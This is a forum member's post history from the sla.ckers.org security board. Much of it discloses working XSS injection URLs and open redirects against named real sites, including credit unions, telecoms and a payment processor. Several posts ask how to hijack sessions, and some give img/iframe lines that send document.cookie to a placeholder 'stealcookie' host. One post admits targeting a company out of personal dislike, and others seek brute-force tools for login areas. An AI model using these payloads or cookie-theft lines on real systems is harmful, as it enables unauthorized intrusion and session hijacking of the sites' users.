Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Current Page: 1 of 1
Results 1 - 24 of 24
7 years ago
sjensen
Mountain America Credit Union http://www.macu.com/home/ "><script>alert('xss');</script> in "Search" box. Midwest United Credit Union http://www.mwucu.com/cgi-bin/search/search.cgi "><script>alert('xss');</script> in "Search" box. United Consumers Credit Union http://www.unitedconsumerscu.com/result.php?Keywords=%22%3E%3Cscri
Forum: Full Disclosure
7 years ago
sjensen
Actually, with a little research and testing I was able to answer my own questions.
Forum: XSS Info
7 years ago
sjensen
Let's assume I can create a persistent xss attack that checks the browser and implements the XHR object. Using this I can execute asynchronous attacks back to the server. Now heres the questions: 1) can I scan the site to find valid pages to request or do I have to know the name of the page/url being requested? 2) assuming a request for a page succeeded (readystate ==4 and status==200) can
Forum: XSS Info
7 years ago
sjensen
Not exactly xss, but nice error messages... http://vonage.com/search_results.php?search_string=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&search.x=8&search.y=11
Forum: Full Disclosure
7 years ago
sjensen
http://att.sbc.com/search/att?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&category=&btnG=Search http://www.cincinnatibell.com/search/default.asp?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=27&y=11 https://market.lucent.com/release/jsp/sso/login.jsp type ("><script>alert('xss');</script>) in the Username field.
Forum: Full Disclosure
7 years ago
sjensen
http://www.netelco.com/redir.php?url=http://sla.ckers.org/
Forum: Full Disclosure
7 years ago
sjensen
http://yellowpages.superpages.com/listings.jsp?N=&C=<script>alert('xss');</script>&STYPE=S&T=&S=ND&PG=L&R=N The above is actually a redirection from http://www22.verizon.com/ http://www.bellsouth.com/ type (</script><script>alert('xss');</script>) in the "Search" box. http://sprint.p.delivery.net/m/p/nxt/reg/cus/ereg.asp?em
Forum: Full Disclosure
7 years ago
sjensen
@rsnake - I found one on AT&T/SBC a day or two ago. I'm going after Vonage...I hate those commercials!
Forum: Full Disclosure
7 years ago
sjensen
http://www.powersportsnetwork.com/redirect.asp?dealercode=1&url=http://sla.ckers.org
Forum: Full Disclosure
7 years ago
sjensen
https://shop.2checkout.com/2co/ search: "><script>alert('xss');</script> http://www.haveninternet.com/search.html search: <script>alert('xss');</script> https://www06.sbc.com/myaccount/Controller?pf=frameworkEntry&e=feMyAccount UserID: "><script>alert('xss');</script>
Forum: Full Disclosure
7 years ago
sjensen
Strange...must be an ASP.NET thing because the window.attachEvent doesn't work. It renders the code to the page, but it doesn't execute it...
Forum: CSRF and Session Info
7 years ago
sjensen
What is the easiest/preferred way of sending the retrieved cookie back to the application to impersonate the user?? I can capture the cookie value, however i'm not clear on exactly how to send that cookie value back to the application in order to demonstrate that the users session has been hijacked.
Forum: XSS Info
7 years ago
sjensen
Adding the "defer" didn't prevent the error, but that's okay, because by adding that script it actually causes the application to crash anyway... I did another test using xss that locked the application in an infinite loop posting the cookie value to another domain, then doing a history.back, then it reposts, then back, etc...also causing the application to crash...
Forum: CSRF and Session Info
7 years ago
sjensen
I change the url, still got the same "IE can't open the internet site..." error message, but it did throw the alert with the cookie in it...
Forum: CSRF and Session Info
7 years ago
sjensen
I pasted the above script in but received a "Internet Explorer can't open the internet site." This maybe because my company has the ha.ckers.org site blocked. btw, I'm running IE 7.
Forum: CSRF and Session Info
7 years ago
sjensen
Just tried them... The first one (<iframe src="javascript:alert('XSS')"></iframe>) renders the iframe with a 404 page, no alert is executed. The second one (<IMG SRC="" onerror="alert('XSS')">) worked! It threw up the alert box. So the next thing is...how can it be exploited maliciously??
Forum: CSRF and Session Info
7 years ago
sjensen
Yes, I may have mixed up my acronyms. Here's why I ask. The developers in my department use various 3rd party rich textbox controls in their applications. Most I have tested do not allow <script> tags, at least not directly. I haven't come up with too many ways to encode them though... But these 3rd party controls do allow html tags, <br>, <img>, <iframe> so I was curiou
Forum: CSRF and Session Info
7 years ago
sjensen
Is it possible to access cookies through CSRF attacks?? Example: (I haven't gotten these to work) <img src='http://somesite.com/stealcookie.asp?cookie=" + document.cookie + "'> or <iframe src='http://somesite.com/stealcookie.asp?cookie=" + document.cookie + "'> I read on another thread creating an iframe to automatically log a person out, then access
Forum: CSRF and Session Info
7 years ago
sjensen
Basically, anything that could run a brute force or dictionary attack against forms authentication or Basic Auth. I know Paros can't scan a "password" protected area without having those credentials supplied first. However, I'm not sure about other products, such as WebInspect, Acunetix, etc... password policies would be the biggest hurdle.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
sjensen
@digi7al64, Actually, I think it's deeper than that. Even though you can bypass the validator controls the request itself is still sent and validated through the System.Web.ClientSideScriptingValidation class which would capture any basic XSS attack. I think the vulnerablity lies in how a request can be created to not be caught by the System.Web.ClientSideScriptingValidation class. The Sy
Forum: Intro
7 years ago
sjensen
Is anyone aware of any web app scanning tools that can either scan protected areas (without supplying credentials) or run brute force attacks against these areas to gain access. I'm asking this because my company has stated that our sites are immune to web scanning, because all applications require an individual to login first prior to accessing any "sensitive" information. And they s
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
sjensen
I'm sure with the proper marketing, it can and will become popular because users aren't concerned as much about security as they are with "Oh, that's neat!"
Forum: News and Links
7 years ago
sjensen
The advisory is located at the link below. I'm not sure if the vulnerability is specific to a particular culture setting or not. http://www.niscc.gov.uk/niscc/docs/br-20061020-00711.html?lang=en
Forum: Intro
7 years ago
sjensen
24. Hello
Been reading the forums for a while, was finally able to register (hotmail account never recieved registration email, so I ended up registering with my work email). My background. I've spent the last 6 years as a web developer, the last 4 doing .NET exclusively. I've been dabbling in web app security for about 3 years now. I start a new job in my department in about 2 weeks, I'll be doing penet
Forum: Intro
Current Page: 1 of 1